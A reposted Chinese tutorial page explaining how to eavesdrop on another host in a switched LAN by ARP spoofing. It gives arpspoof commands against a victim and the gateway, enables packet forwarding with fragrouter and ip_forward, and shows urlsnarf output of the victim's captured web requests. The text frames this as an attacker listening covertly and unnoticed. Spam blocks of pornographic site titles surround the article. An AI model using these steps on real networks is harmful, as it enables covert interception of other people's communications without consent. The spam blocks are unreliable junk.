亚洲香蕉成人av网站在线观看_欧美精品成人91久久久久久久_久久久久久久久久久亚洲_热久久视久久精品18亚洲精品_国产精自产拍久久久久久_亚洲色图国产精品_91精品国产网站_中文字幕欧美日韩精品_国产精品久久久久久亚洲调教_国产精品久久一区_性夜试看影院91社区_97在线观看视频国产_68精品久久久久久欧美_欧美精品在线观看_国产精品一区二区久久精品_欧美老女人bb

首頁 > 學院 > 網絡通信 > 正文

[TIP]交換環境下的SnifferZT

2019-11-05 01:41:47
字體:
來源:轉載
供稿:網友

  通常在局域網環境中,我們都是通過交換環境的網關上網的,在交換環境中使用NetXray或者NAI Sniffer一類的嗅探工具除了抓到自己的包以外,是不能看到其他主機的網絡通信的。
  
  但是我們可以通過利用ARP欺騙可以實現Sniffer的目的。
  
  ARP協議是將ip解析為MAC地址的協議,局域網中的通信都是基于MAC的。
  
  例如下面這樣的情況:
  
  在局域網中192.168.0.24和192.168.0.29都是通過網關192.168.0.1上網的,假定攻擊者的系統為192.168.0.24,他希望聽到192.168.0.29的通信,那么我們就可以利用ARP欺騙實現。
  
  1、 首先告訴192.168.0.29,網關192.168.0.1的MAC地址是192.168.0.24
  
  2、 告訴192.168.0.1,192.168.0.29的MAC地址是192.168.0.24。
  
  這樣192.168.0.29和192.168.0.1之間的數據包,就會發給192.168.0.24,也就是攻擊者的機器,這樣就可以聽到會話了。但是這么做的有一個問題,192.168.0.29發現自己不能上網了,因為原來發給192.168.0.1的數據包都被192.168.0.24接收了,而并沒有發給網關192.168.0.1。
  
  這時候192.168.0.24設置一個包轉發的東西就可以解決這個問題了,也就是從192.168.0.29收到的包轉發給192.168.0.1,在把從192.168.0.1收到的包發給192.168.0.29。這樣192.168.0.29根本就不會意識到自己被監聽了。
  
  具體實現:
  
  1、 欺騙192.168.0.29,告訴這臺機器網關192.168.0.1的MAC地址是自己(192.168.0.24)。
  
  [root@linux dsniff-2.3]# ./arpspoof -i eth0 -t 192.168.0.29 192.168.0.1
  
  0:50:56:40:7:71 0:0:86:61:6b:4e 0806 42: arp reply 192.168.0.1 is-at 0:50:56:40:7:71
  
  0:50:56:40:7:71 0:0:86:61:6b:4e 0806 42: arp reply 192.168.0.1 is-at 0:50:56:40:7:71
  
  0:50:56:40:7:71 0:0:86:61:6b:4e 0806 42: arp reply 192.168.0.1 is-at 0:50:56:40:7:71
  
  0:50:56:40:7:71 0:0:86:61:6b:4e 0806 42: arp reply 192.168.0.1 is-at 0:50:56:40:7:71
  
  0:0:21:0:0:18 0:0:86:61:6b:4e 0806 42: arp reply 192.168.0.1 is-at 0:0:21:0:0:18
  
  ………………………………..
  
  這時候對192.168.0.29的ARP欺騙就開始了。
  
   
  
  2、 欺騙192.168.0.1,告訴網關192.168.0.29的MAC地址是自己(192.168.0.24)。
  
  [root@Linux dsniff-2.3]# ./arpspoof -i eth0 -t 192.168.0.1 192.168.0.29
  
  0:50:56:40:7:71 0:0:21:0:0:18 0806 42: arp reply 192.168.0.29 is-at 0:50:56:40:7:71
  
  0:50:56:40:7:71 0:0:21:0:0:18 0806 42: arp reply 192.168.0.29 is-at 0:50:56:40:7:71
  
  0:50:56:40:7:71 0:0:21:0:0:18 0806 42: arp reply 192.168.0.29 is-at 0:50:56:40:7:71
  
  0:0:86:61:6b:4e 0:0:21:0:0:18 0806 42: arp reply 192.168.0.29 is-at 0:0:86:61:6b:4e
  
  0:0:86:61:6b:4e 0:0:21:0:0:18 0806 42: arp reply 192.168.0.29 is-at 0:0:86:61:6b:4e
  
  0:0:86:61:6b:4e 0:0:21:0:0:18 0806 42: arp reply 192.168.0.29 is-at 0:0:86:61:6b:4e
  
   
  
  其實在這個時候192.168.0.29是可以發現的自己被欺騙了。在CMD下面使用ARP ?a命令:
  
  C:/WINNT>arp -a
  
  
  
  Interface: 192.168.0.29 on Interface 0x1000003
  
  Internet Address Physical Address Type
  
  192.168.0.1 00-50-56-40-07-71 dynamic
  
  192.168.0.24 00-50-56-40-07-71 dynamic
  
  兩個IP地址的MAC地址居然是一模一樣的!不過很少有人會這么做:-)。
  
   
  
  3、 設置一個包轉發
  
  [root@Linux fragrouter-1.6]# ./fragrouter -B1
  
  fragrouter: base-1: normal IP forwarding
  
  在這之前別忘了首先需要打開包轉發的功能
  
  [root@Linux /proc]# echo 1 >/PRoc/sys/net/ipv4/ip_forward
  
  萬事具備,可以開始SNIFFER了。
  
  例如想看看192.168.0.29在瀏覽什么地方:
  
  [root@Linux dsniff-2.3]# ./urlsnarf
  
  urlsnarf: listening on eth0 [tcp port 80 or port 8080 or port 3128]
  
  Kitty[18/May/2002:20:02:25+1100]"GET http://pub72.ezboard.com/flasile155...9.topic&index=7 HTTP/1.1" - - "http://www.Google.com/search?hl=zh-CN&ie=UTF8&oe=UTF8&q=fdfds&BTnG=Google%E6%90%9C%E7%B4%A2&lr=" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)"
  
  Kitty - - [18/May/2002:20:02:28 +1100] "GET http://www.ezboard.com/ztyles/default.CSS HTTP/1.1" - - "http://pub72.ezboard.com/flasile15596frm1.showAddReplyScreenFromWeb?topicID=29.topic&index=7" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)"
  
  Kitty - - [18/May/2002:20:02:29 +1100] "GET http://www1.ezboard.com/spch.js?customerid=1147458082 HTTP/1.1" - - "http://pub72.ezboard.com/flasile15596frm1.showAddReplyScreenFromWeb?topicID=29.topic&index=7" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)"
  
  當然也可以知道其他………:-)
  
  
  整個過程需要在Linux下面實現,所用到的所有工具可以在http://www.netXeyes.org/arpsniffer.rar下載。


發表評論 共有條評論
用戶名: 密碼:
驗證碼: 匿名發表
亚洲香蕉成人av网站在线观看_欧美精品成人91久久久久久久_久久久久久久久久久亚洲_热久久视久久精品18亚洲精品_国产精自产拍久久久久久_亚洲色图国产精品_91精品国产网站_中文字幕欧美日韩精品_国产精品久久久久久亚洲调教_国产精品久久一区_性夜试看影院91社区_97在线观看视频国产_68精品久久久久久欧美_欧美精品在线观看_国产精品一区二区久久精品_欧美老女人bb
日韩视频精品在线| 欧美另类极品videosbestfree| 日韩的一区二区| 久热精品视频在线免费观看| 久久久久久网站| 国产精品美女呻吟| 中文字幕久久久| 欧美噜噜久久久xxx| 精品亚洲va在线va天堂资源站| 91日韩在线播放| 欧美一区三区三区高中清蜜桃| 日韩大陆毛片av| 亚洲成人教育av| 51久久精品夜色国产麻豆| 亚洲欧美日韩国产成人| 国产99久久精品一区二区永久免费| 亚洲电影免费观看高清完整版在线观看| 91老司机在线| 亚洲精品720p| 国产精品麻豆va在线播放| 亚洲国产精品va| 国产成人精品久久二区二区91| 91chinesevideo永久地址| 午夜精品久久久久久久久久久久久| 这里只有精品在线观看| 性欧美xxxx| 久久久精品一区二区| 国产福利精品视频| 精品久久久久久久久久久久久| 欧美成人黑人xx视频免费观看| 国产精品视频xxx| 亚洲国产精品福利| 成人自拍性视频| 久久久久久久久中文字幕| 国产精品女视频| 国产91久久婷婷一区二区| 国产精品视频一区国模私拍| 欧美乱大交xxxxx另类电影| 538国产精品视频一区二区| 久久成人免费视频| 亚洲精品成人久久| 91夜夜未满十八勿入爽爽影院| 日韩精品久久久久| 亚洲欧美制服综合另类| 国产一区二区三区在线看| 中文字幕亚洲综合久久| 国产69精品久久久久99| 欧美激情喷水视频| 91色精品视频在线| 欧美人在线视频| 国产精品久久999| 亚洲精品国产精品久久清纯直播| 国产精品国产三级国产aⅴ9色| 欧美精品999| 亚洲国产精品久久久久| 国产精品视频xxxx| 97精品久久久中文字幕免费| 在线a欧美视频| 欧美电影免费观看网站| 久久久亚洲福利精品午夜| 668精品在线视频| 精品国产一区二区三区久久| 亚洲aⅴ男人的天堂在线观看| 国产精品99免视看9| 亚洲精品福利在线| 色婷婷综合久久久久| 国产一区二区三区三区在线观看| 欧美精品免费在线| 热久久这里只有精品| 自拍偷拍亚洲在线| 亚洲精品456在线播放狼人| 亚洲国产精品小视频| 久久久久久91香蕉国产| 亚洲精品自拍视频| 国产精品免费一区| 国产一区二区三区中文| 日韩女优人人人人射在线视频| 亚洲www在线观看| 这里只有精品在线播放| 国产精品国产福利国产秒拍| 精品国产精品三级精品av网址| 欧美成人午夜剧场免费观看| 97香蕉超级碰碰久久免费软件| 日韩在线视频一区| 国产精品91在线观看| 欧美黑人狂野猛交老妇| 亚洲精品福利在线| 国产在线观看精品| 欧美性猛xxx| 久久久久久亚洲精品中文字幕| 久久天天躁狠狠躁老女人| 日韩欧美在线视频日韩欧美在线视频| 欧美天天综合色影久久精品| 亚洲精品资源美女情侣酒店| 欧美日韩国产限制| 91精品国产乱码久久久久久久久| 在线观看久久久久久| 国产一区二区三区在线视频| www日韩中文字幕在线看| 国内精品一区二区三区| 亚洲精品一区二区网址| 亚洲999一在线观看www| 国产一级揄自揄精品视频| 国产精品国模在线| 欧美国产精品人人做人人爱| 国产+人+亚洲| 久久在线视频在线| 久久久久亚洲精品国产| 久久影视电视剧凤归四时歌| 欧美激情在线观看| 欧美一级片一区| 成人国产在线视频| 久久97精品久久久久久久不卡| 国产一区二区三区丝袜| 日本久久久久亚洲中字幕| 久久国产精品久久久久| 国产精品视频久久| 欧美电影电视剧在线观看| 日韩影视在线观看| 亚洲免费精彩视频| 亚洲欧洲国产一区| 国产精品18久久久久久首页狼| 亚洲欧洲在线播放| 成人乱色短篇合集| 日本久久久久久久久| 成人一区二区电影| 日韩精品免费在线视频| 久久躁狠狠躁夜夜爽| xxxx性欧美| 精品国产鲁一鲁一区二区张丽| 国产suv精品一区二区三区88区| 国产福利视频一区| 亚洲日韩中文字幕| 精品国内产的精品视频在线观看| 欧美激情一区二区三区成人| 91网站免费观看| 国产精品青草久久久久福利99| 亚洲欧美国产精品久久久久久久| 成人网在线免费看| 成人免费观看网址| 91高清视频在线免费观看| 欧美激情久久久久| 成人免费观看a| 欧美激情伊人电影| 午夜精品一区二区三区在线视| 亚洲国产成人精品久久| 国产在线精品自拍| 亚洲综合中文字幕在线观看| 福利视频一区二区| 欧美中文字幕在线| 欧美成人一区在线| 久久久久久国产精品| 中文字幕久热精品视频在线| 搡老女人一区二区三区视频tv| 久久久亚洲福利精品午夜| 国产成人jvid在线播放| 午夜精品国产精品大乳美女| 日韩电影大片中文字幕| 97国产精品视频人人做人人爱| 亚洲午夜未删减在线观看| 中文字幕亚洲综合| 午夜精品久久久99热福利| 欧美成人免费全部观看天天性色| 91亚洲午夜在线|